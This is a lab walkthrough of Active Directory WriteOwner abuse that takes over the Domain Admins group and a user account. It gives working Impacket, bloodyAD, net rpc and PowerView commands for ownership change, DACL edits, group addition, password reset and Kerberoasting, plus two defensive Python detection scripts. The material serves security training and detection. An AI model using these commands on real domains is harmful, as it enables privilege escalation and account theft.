Abusing AD-DACL: WriteOwner
In this post, we delve into WriteOwner Active Directory abuse, a powerful technique that allows attackers to change the ownership of directory objects. Specifically, by abusing the WriteOwner permission in Discretionary Access Control Lists (DACLs), adversaries can take over sensitive objects and escalate privileges within the domain.
To begin, we outline the lab setup necessary to simulate these attacks and map methods to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Additionally, we cover detection mechanisms for identifying suspicious activities linked to WriteOwner attacks, alongside actionable recommendations for mitigating these vulnerabilities. Overall, this overview equips security professionals with critical insights to recognize and defend against these prevalent threats.
Table of Contents
Abusing AD-DACL- WriteOwner
WriteOwner Permission
Prerequisites
Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group
Exploitation Phase I – User Owns WriteOwner Permission on a Group
Bloodhound – Hunting for Weak Permission
Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)
- Linux Impacket tool – Granting Ownership & Full Control
- Linux – Adding Member to the Group
Linux Net RPC – Samba
Linux Bloody AD
- Windows PowerShell Powerview – Granting Ownership & Full Control
- Windows Net command – Adding Member to the Group
Lab Setup – User Owns WriteOwner Permission on Another User
Exploitation Phase II – User Owns WriteOwner Permission on Another User
Bloodhound – Hunting for Weak Permission
Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)
- Linux Impacket tool – Granting Ownership & Full Control
- Linux Python Script – TargetedKerberoast
- Linux – Change Password
Linux Net RPC – Samba
Linux Bloody AD
- Windows PowerShell Powerview – Granting Ownership & Full Control
- Windows PowerShell Powerview – Kerberoasting
- Windows PowerShell Powerview – Change Password
Detection & Mitigation
WriteOwner Permission
The WriteOwner permission allows a user to change the ownership of an object to a different user or principal, including one controlled by an attacker. Consequently, an attacker can exploit this permission to take ownership of a target object.
Once the attacker successfully assumes ownership, they can fully manipulate the object. This includes modifying permissions to grant themselves or others Full Control over the object. For example, the attacker could assign Full Control permissions, allowing unrestricted access to read, write, or delete the object.
- Specifically, WriteOwner permissions on a group allow attackers to grant the right to add members to that group.
- When applied to a user object, this permission enables attackers to gain full control over the account.
- In the case of computer objects, it allows the attacker to obtain unrestricted access and control.
- Finally, possessing WriteOwner permissions on a domain object enables the attacker to perform a DCSync operation, simulating a Domain Controller to extract sensitive credentials.
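As an added illustration (not code from the original post), the following Python audits an object's security descriptor in SDDL form and flags access-allowed ACEs that grant WriteOwner, WriteDacl or GenericAll to principals outside a trusted set, which is the check a defender would run to find the permission this post abuses. It goes beyond the post by also handling numeric access masks; the descriptors, the trustee SIDs and the trusted-principal list are constructed for this example.

```python
import re

# SDDL two-letter rights codes mapped to the access-mask bits that matter for object takeover
RIGHT_BITS = {
    "WO": 0x00080000,  # WRITE_OWNER: the WriteOwner edge BloodHound reports
    "WD": 0x00040000,  # WRITE_DAC: rewrite the DACL (an owner holds this implicitly)
    "GA": 0x10000000,  # GENERIC_ALL: Full Control
}
RIGHT_NAMES = (("WriteOwner", 0x00080000), ("WriteDacl", 0x00040000), ("GenericAll", 0x10000000))
# Well-known SID abbreviations expected to hold these rights on privileged objects (assumption for this example)
TRUSTED = {"DA", "EA", "BA", "SY", "AO"}
DACL_RE = re.compile(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_rights(field):
    """Turn an SDDL rights field (hex mask or concatenated two-letter codes) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHT_BITS.get(field[i:i + 2], 0)  # codes we do not track contribute nothing
    return mask

def dangerous_aces(sddl, trusted=TRUSTED):
    """List (trustee, [rights]) for allow ACEs granting WriteOwner/WriteDacl/GenericAll to untrusted principals."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    findings = []
    for ace in ACE_RE.findall(m.group(1)):
        parts = ace.split(";")
        if len(parts) < 6 or parts[0] != "A":  # only access-allowed ACEs grant rights
            continue
        mask, trustee = parse_rights(parts[2]), parts[5]
        hits = [name for name, bit in RIGHT_NAMES if mask & bit]
        if hits and trustee not in trusted:
            findings.append((trustee, hits))
    return findings

# Constructed descriptors: Domain Admins before the lab ACE, with the lab ACE, and after the WriteOwner-to-FullControl chain
BEFORE = "O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPLCLORC;;;AU)"
LAB_ACE = "O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;WO;;;S-1-5-21-1111-2222-3333-1105)(A;;RPLCLORC;;;AU)"
TAKEN_OVER = "O:S-1-5-21-1111-2222-3333-1105G:DAD:(A;;GA;;;S-1-5-21-1111-2222-3333-1105)(A;;0x80000;;;S-1-5-21-1111-2222-3333-1106)"

if __name__ == "__main__":
    for label, sd in (("before", BEFORE), ("lab ACE", LAB_ACE), ("taken over", TAKEN_OVER)):
        print(label, dangerous_aces(sd))
```

The same check applied to every object in a BloodHound or LDAP export gives the list of WriteOwner edges before an attacker finds them.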
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Impacket
- Windows 10/11 – As Client
Lab Setup – User Owns WriteOwner Permission on the Domain Admin Group
Create the AD Environment:
To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.
Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active Directory Domain Services role.
- Set up the domain (e.g., ignite.local).
User Accounts:
- Create a standard user account named Aaru.
net user aaru Password@1 /add /domain
Assign the “WriteOwner” Privilege to Aaru:
Once your AD environment is set up, you need to assign the “WriteOwner” privilege to Aaru over the Domain Admins group.
Steps:
- Open Active Directory Users and Computers (ADUC) on the Domain Controller.
- Enable the Advanced Features view by clicking on View > Advanced Features.
- Locate the Domain Admins group in the Users container.
- Right-click on Domain Admins and go to Properties.
- Go to the Security tab and click the Add button.
- In the “Enter the object name to select” box, type Aaru, click Check Names, then click OK.
- Select the Aaru user and, in the Permissions section, click the Advanced button.
- In the Advanced Security Settings box, double-click the Aaru user’s permission entry.
- In the Permissions section, check the box for Modify Owner.
- Apply the settings.
At this point, Aaru now has WriteOwner rights over the Domain Admins group, meaning they can add themselves to the group.
Exploitation Phase I – User Owns WriteOwner Permission on a Group
Bloodhound – Hunting for Weak Permission
Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Aaru has the WriteOwner permission on the Domain Admins group.
bloodhound-python -u aaru -p Password@1 -ns 192.168.1.6 -d ignite.local -c All
In the BloodHound graph, the tester selects the Aaru user node and looks at Outbound Object Control; the First Degree Object Control count of 1 is the single edge of interest.
That edge shows that the Aaru user has the WriteOwner privilege over the Domain Admins group.
Method for Exploitation – Granting Ownership & Full Control Followed by Account Manipulation (T1098)
Linux Impacket tool – Granting Ownership & Full Control
Granting Ownership:
From UNIX-like systems, this can be done with Impacket’s owneredit.py (Python); the Kali package installs it as impacket-owneredit.
impacket-owneredit -action write -new-owner 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6
With the help of owneredit, the owner of this object is successfully changed, and the aaru user now has ownership of the group.
Granting Full Control:
Let’s grant the user ‘Aaru’ full control over the Domain Admins group using Impacket’s dacledit tool.
From UNIX-like systems, this can be done with Impacket’s dacledit.py (Python); the Kali package installs it as impacket-dacledit.
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.6
With the help of dacledit, the DACL for this object is successfully modified, and the aaru user now has full control over the group.
Linux – Adding Member to the Group
Linux Net RPC – Samba
The tester can abuse this permission by adding the Aaru user to the Domain Admins group and then listing the group’s members to confirm that Aaru has become a Domain Admin.
net rpc group addmem "Domain Admins" aaru -U ignite.local/aaru%'Password@1' -S 192.168.1.6
Linux Bloody AD
Alternatively, the same can be achieved using bloodyAD:
bloodyAD --host "192.168.1.6" -d "ignite.local" -u "aaru" -p "Password@1" add groupMember "Domain Admins" "aaru"
Windows PowerShell Powerview – Granting Ownership & Full Control
From a Windows system, this can be achieved with Set-DomainObjectOwner to grant ownership, followed by Add-DomainObjectAcl (both from the PowerView module) to grant full permissions over the target.
powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'aaru'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "aaru"
Windows Net command – Adding Member to the Group
This can be achieved from a native command line using the Windows net command.
net group "domain admins" aaru /add /domain
Thus, from the user’s properties we can see that the Aaru user has become a member of Domain Admins.
Lab Setup – User Owns WriteOwner Permission on Another User
In this lab setup, we will simulate a scenario where one user has WriteOwner permission over another user. Specifically, we will create two users, Ankur and Sakshi, where Sakshi is granted WriteOwner access over Ankur.
Create the AD Environment and User accounts
To begin, set up a Windows Server (2016 or 2019 recommended) as the Domain Controller (DC) and prepare a client machine (Windows or Linux) to run enumeration and exploitation tools.
Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active Directory Domain Services role.
- Set up the domain (e.g., ignite.local).
User Accounts:
- Next, create two AD user accounts named Ankur and Sakshi using the following commands:
net user ankur Password@1 /add /domain
net user sakshi Password@1 /add /domain
Assign the “WriteOwner” Privilege:
After creating the users, proceed to assign WriteOwner permission to Sakshi over the Ankur user account.
- Open Active Directory Users and Computers (ADUC) on the Domain Controller.
- Enable the Advanced Features view by clicking on View > Advanced Features.
- Locate the Ankur user in the Users container.
- Right-click on Ankur User and go to Properties.
Modify Permissions
- Navigate to the Security tab and click the Add button.
- In the “Enter the object name to select” box, type Sakshi, click Check Names, then click OK.
- Select the Sakshi user and, in the Permissions section, click the Advanced button.
- In the Advanced Security Settings box, double-click the Sakshi user’s permission entry.
- In the Permissions section, check the box for Modify Owner.
- Click Apply to save the settings.
At this point, the Sakshi user now holds WriteOwner permission over the Ankur user object. As a result, Sakshi can take ownership and potentially escalate privileges or manipulate permissions on that object.
Exploitation Phase II – User Owns WriteOwner Permission on Another User
Bloodhound – Hunting for Weak Permission
Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Sakshi has the WriteOwner permission for Ankur user.
bloodhound-python -u sakshi -p Password@1 -ns 192.168.1.6 -d ignite.local -c All
In the BloodHound graph, the tester selects the Sakshi user node and looks at Outbound Object Control; the First Degree Object Control count of 1 is the single edge of interest.
From the graph it can be observed that the Sakshi user holds the WriteOwner privilege over the Ankur user.
Method for Exploitation – Granting Ownership & Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)
Attackers can exploit the WriteOwner permission when they gain control of an object that has this privilege over another directory object. This allows them to grant ownership, then assign full control, and ultimately perform attacks like Kerberoasting or a Password Change without knowing the victim’s current credentials.
Linux Impacket tool – Granting Ownership & Full Control
Granting Ownership:
To begin, use Impacket’s toolkit from a UNIX-like system. The owneredit.py tool allows changing the ownership of a directory object.
impacket-owneredit -action write -new-owner 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6
With the help of owneredit, the owner of the Ankur user object is successfully changed. As a result, the Sakshi user now owns the Ankur account.
Granting Full Control:
Next, use dacledit.py to assign Full Control to Sakshi over the Ankur user object. From UNIX-like systems, this can be done with Impacket’s dacledit.py (Python); the Kali package installs it as impacket-dacledit.
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'sakshi' -target-dn 'CN=ankur,CN=Users,DC=ignite,DC=local' 'ignite.local'/'sakshi':'Password@1' -dc-ip 192.168.1.6
With the help of dacledit, the DACL for this object is successfully modified, and Sakshi now has full control over the Ankur user.
Now that the user has full control over the target, they can either Kerberoast it or change its password without knowing the target’s current password (ForceChangePassword).
Linux Python Script – TargetedKerberoast
From UNIX-like systems, this can be done with targetedKerberoast.py (Python).
./targetedKerberoast.py --dc-ip '192.168.1.6' -v -d 'ignite.local' -u 'sakshi' -p 'Password@1'
Finally, once attackers dump hashes (e.g., from Kerberoasting), they can use tools like John the Ripper and common dictionaries such as RockYou.txt to brute-force weak passwords.
Linux – Change Password
Linux Net RPC – Samba
You can achieve this from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients.
net rpc password ankur 'Password@987' -U ignite.local/sakshi%'Password@1' -S 192.168.1.6
Linux Bloody AD
Alternatively, you can achieve this using bloodyAD:
bloodyAD --host "192.168.1.6" -d "ignite.local" -u "sakshi" -p "Password@1" set password "ankur" "Password@987"
Windows PowerShell Powerview – Granting Ownership & Full Control
On Windows systems, attackers can leverage the PowerView module to grant both Ownership and Full Control over a target object. This process involves two core cmdlets: Set-DomainObjectOwner and Add-DomainObjectAcl.
powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'ankur' -OwnerIdentity 'sakshi'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ankur" -PrincipalIdentity "sakshi"
Set-DomainObjectOwner assigns ownership of the Ankur user object to the Sakshi user. With the help of Set-DomainObjectOwner and Add-DomainObjectAcl, the DACL for the object is successfully updated. As a result, the Sakshi user gains full control over the Ankur account, including permissions to modify, reset, or delete it.
Now that the user has full control over the target, they can either Kerberoast it or change its password without knowing the target’s current password (ForceChangePassword).
Windows PowerShell Powerview – Kerberoasting
To proceed, attackers can use PowerView’s Set-DomainObject and Get-DomainSPNTicket to manipulate SPNs (Service Principal Names) and request service tickets for offline cracking.
Set-DomainObject -Identity 'ankur' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'ankur' | Select serviceprincipalname
$User = Get-DomainUser 'ankur'
$User | Get-DomainSPNTicket
Kerberoasting allows attackers to extract TGS tickets for SPN-enabled accounts and then brute-force them offline using hash cracking tools.
Windows PowerShell Powerview – Change Password
The attacker can change the user’s password with the PowerView module’s Set-DomainUserPassword cmdlet.
Alternatively, if the attacker prefers a full account takeover, they can reset the user’s password without knowing the current one.
$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'ankur' -AccountPassword $NewPassword
The Sakshi user resets Ankur’s password without any knowledge of the original, ensuring complete account compromise.
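As an added detection example (not part of the original post), the following Python correlates Windows Security events over both exploitation chains shown above, the group takeover in Phase I and the user takeover in Phase II: the ownership grab (4662 with WRITE_OWNER access), the DACL rewrite (5136 on nTSecurityDescriptor) and the follow-on action (4728 member added to a global group, 4724 password reset, or an SPN written for Kerberoasting), all by the same subject on the same object within a short window. The events are constructed samples in a simplified dict form, not real log output, and the subject and object names are taken from the lab.

```python
from datetime import datetime, timedelta

# Constructed sample events shaped like Security log entries 4662/5136/4728/4724 (not real log records)
def ev(time, eid, subject, obj, **fields):
    return {"time": time, "id": eid, "subject": subject, "object": obj, **fields}

DA = "CN=Domain Admins,CN=Users,DC=ignite,DC=local"
ANKUR = "CN=ankur,CN=Users,DC=ignite,DC=local"
EVENTS = [
    ev("2024-05-01T10:00:05", 4662, "IGNITE\\aaru", DA, access="WRITE_OWNER"),
    ev("2024-05-01T10:00:09", 5136, "IGNITE\\aaru", DA, attribute="nTSecurityDescriptor"),
    ev("2024-05-01T10:00:40", 4728, "IGNITE\\aaru", DA, member="CN=aaru,CN=Users,DC=ignite,DC=local"),
    ev("2024-05-01T11:00:00", 4662, "IGNITE\\sakshi", ANKUR, access="WRITE_OWNER"),
    ev("2024-05-01T11:00:03", 5136, "IGNITE\\sakshi", ANKUR, attribute="nTSecurityDescriptor"),
    ev("2024-05-01T11:01:10", 4724, "IGNITE\\sakshi", ANKUR),
    ev("2024-05-01T12:00:00", 5136, "IGNITE\\Administrator", ANKUR, attribute="nTSecurityDescriptor"),  # routine change, no alert
]

def describe_impact(event):
    """Map a follow-on event to the action it represents, or None if it is not an impact step."""
    if event["id"] == 4728:
        return "member added to group"
    if event["id"] == 4724:
        return "password reset"
    if event["id"] == 5136 and event.get("attribute") == "servicePrincipalName":
        return "SPN written (Kerberoast setup)"
    return None

def detect_writeowner_chains(events, window_minutes=30):
    """Alert when one subject takes ownership of an object (4662 WRITE_OWNER), rewrites its DACL
    (5136 on nTSecurityDescriptor) and then acts on the same object, all within the window."""
    events = sorted(events, key=lambda e: e["time"])
    window = timedelta(minutes=window_minutes)
    alerts = []
    for event in events:
        if event["id"] != 4662 or "WRITE_OWNER" not in event.get("access", ""):
            continue
        t0 = datetime.fromisoformat(event["time"])
        later = [x for x in events if x["subject"] == event["subject"] and x["object"] == event["object"]
                 and t0 < datetime.fromisoformat(x["time"]) <= t0 + window]
        dacl_rewritten = any(x["id"] == 5136 and x.get("attribute") == "nTSecurityDescriptor" for x in later)
        impact = [d for d in map(describe_impact, later) if d]
        if dacl_rewritten and impact:
            alerts.append((event["subject"], event["object"], impact))
    return alerts

if __name__ == "__main__":
    for alert in detect_writeowner_chains(EVENTS):
        print(alert)
```

Both 4662 and 5136 require an auditing SACL on the target objects, so the rule only fires where Directory Service Access and Directory Service Changes auditing are enabled.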
Author: Pradnya Pawar is an InfoSec researcher and Security Tech Lead.